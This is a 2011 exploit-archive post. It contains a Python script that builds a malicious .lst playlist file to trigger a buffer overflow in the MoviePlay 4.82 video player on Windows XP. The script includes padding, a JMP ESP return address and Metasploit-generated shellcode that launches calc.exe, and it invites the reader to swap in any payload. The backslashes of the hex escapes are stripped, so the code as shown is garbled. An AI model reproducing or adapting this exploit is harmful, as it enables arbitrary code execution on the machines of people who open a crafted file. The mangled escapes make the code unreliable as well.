MoviePlay 4.82 Buffer Overflow
Posted on 12 February 2011
#!/usr/bin/env python # MoviePlay 4.82 (.lst) Buffer Overflow # Author: sickness # Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml # Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/ # Tested : Windows XP Professional SP3 (EN) latest updates with IE8 # DATE : 10/02/2011 ################################################################### # You might need to change the EIP address # The payload can be replaced with whatever you want, there is enough space. ################################################################### begin = "x5bx4dx6fx76x69x65x50x6cx61x79x5dx0dx0ax46x69x6cx65x4ex61x6dx65x30x3dx43x3ax5c" junk = 'x90' * 1085 eip = 'xD7x30x9Dx7C' # JMP ESP SHELL32.dll nops = 'x90'*16 # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c sc = ("xbex41x9ex4exd0x33xc9xdaxd7xd9x74x24xf4xb1x33" "x58x31x70x10x83xe8xfcx03x31x92xacx25x4dx42xb9" "xc6xadx93xdax4fx48xa2xc8x34x19x97xdcx3fx4fx14" "x96x12x7bxafxdaxbax8cx18x50x9dxa3x99x54x21x6f" "x59xf6xddx6dx8exd8xdcxbexc3x19x18xa2x2cx4bxf1" "xa9x9fx7cx76xefx23x7cx58x64x1bx06xddxbaxe8xbc" "xdcxeax41xcax97x12xe9x94x07x23x3exc7x74x6ax4b" "x3cx0ex6dx9dx0cxefx5cxe1xc3xcex51xecx1ax16x55" "x0fx69x6cxa6xb2x6axb7xd5x68xfex2ax7dxfax58x8f" "x7cx2fx3ex44x72x84x34x02x96x1bx98x38xa2x90x1f" "xefx23xe2x3bx2bx68xb0x22x6axd4x17x5ax6cxb0xc8" "xfexe6x52x1cx78xa5x38xe3x08xd3x05xe3x12xdcx25" "x8cx23x57xaaxcbxbbxb2x8fx24xf6x9fxb9xacx5fx4a" "xf8xb0x5fxa0x3excdxe3x41xbex2axfbx23xbbx77xbb" "xd8xb1xe8x2exdfx66x08x7bxbcxe9x9axe7x6dx8cx1a" "x8dx71") exploit = junk + eip + nops + sc rest = 'x90'*(2000-len(exploit)) end="x2ex6dx70x33x0dx0ax46x69x6cx65x4ex61x6dx65x31x3dx0dx0ax4ex75x6dx46x69x6cx65x73x3dx31x0dx0a" try: f = open("evil.lst","w"); f.write(begin+exploit+rest+end) f.close() print "Done!" except: print "Something went wront!"
